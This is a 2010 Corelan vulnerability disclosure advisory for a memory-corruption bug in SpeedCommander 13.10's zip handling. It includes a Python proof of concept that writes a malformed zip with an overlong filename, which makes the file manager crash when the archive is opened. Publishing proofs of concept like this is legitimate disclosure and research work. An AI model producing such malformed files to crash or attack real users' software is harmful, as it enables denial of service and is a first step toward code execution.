|------------------------------------------------------------------| | __ __ | | _________ ________ / /___ _____ / /____ ____ _____ ___ | | / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ | | / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / | | \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ | | | | http://www.corelan.be:8800 | | security@corelan.be | | | |-------------------------------------------------[ EIP Hunters ]--| | | | Vulnerability Disclosure Report | | | |------------------------------------------------------------------| Advisory : CORELAN-10-028 Disclosure date : April 20th, 2010 http://www.corelan.be:8800/advisories.php?id=CORELAN-10-028 00 : Vulnerability information Product : SpeedCommander Version : 13.10 (latest version) Vendor : SpeedProduct URL : http://www.speedproject.de Platform : Windows Type of vulnerability : Memory Corruption Risk rating : Med Issue fixed in version : not fixed Vulnerability discovered by : TecR0c Corelan Team : http://www.corelan.be:8800/index.php/security/corelan-team-members/ 01 : Vendor description of software "The SpeedCommander application was designed to be a comfortable file manager. It builds on the proven two window technology and offers a multitude of exclusive features. Sort, copy, move or delete your files either using the keyboard or the mouse." 02 : Vulnerability details A flaw in how the application handles a overly long zip filename which an attacker can utilize in a manner other than the designer intended. A memory corruption will occur which will result in a "SpeedCommander.exe encountered a problem in module CxZip61u.dll and needs to close." 03 : Author/Vendor communication March 31th, 2010 : author contacted April 9th, 2010 : sent reminder April 20th, 2010 : No response, public disclosure 04: Proof of Concept #!/usr/bin/python # ####################################################################### # Title: Speed Commander 13.10 (.zip) Memory Corruption # Author: TecR0c - http://tecninja.net/blog & http://twitter.com/TecR0c # Found by: TecR0c # Download: http://www.sp-download.de/sc13/sc13.exe # Platform: Windows XP sp3 En # Advisory: http://www.corelan.be:8800/advisories.php?id=CORELAN-10-028 # Greetz to: Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # ####################################################################### # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. # Trigger : Open the application, Browse to the zip file > double click = BOOM! print "|------------------------------------------------------------------|" print "| __ __ |" print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |" print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |" print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |" print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |" print "| |" print "| http://www.corelan.be:8800 |" print "| security@corelan.be |" print "| |" print "|-------------------------------------------------[ EIP Hunters ]--|" print "[+] SpeedCommander (.zip) - by TecR0c" ldf_header = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00" "\xe4\x0f" "\x00\x00\x00") cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\xe4\x0f" "\x00\x00\x00\x00\x00\x00\x01\x00" "\x24\x00\x00\x00\x00\x00\x00\x00") eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00" "\x12\x10\x00\x00" "\x02\x10\x00\x00" "\x00\x00") buff = "\x41" * 4064 buff += ".txt" mefile = open('SpeedCommander.zip','w'); mefile.write(ldf_header + buff + cdf_header + buff + eofcdf_header); mefile.close()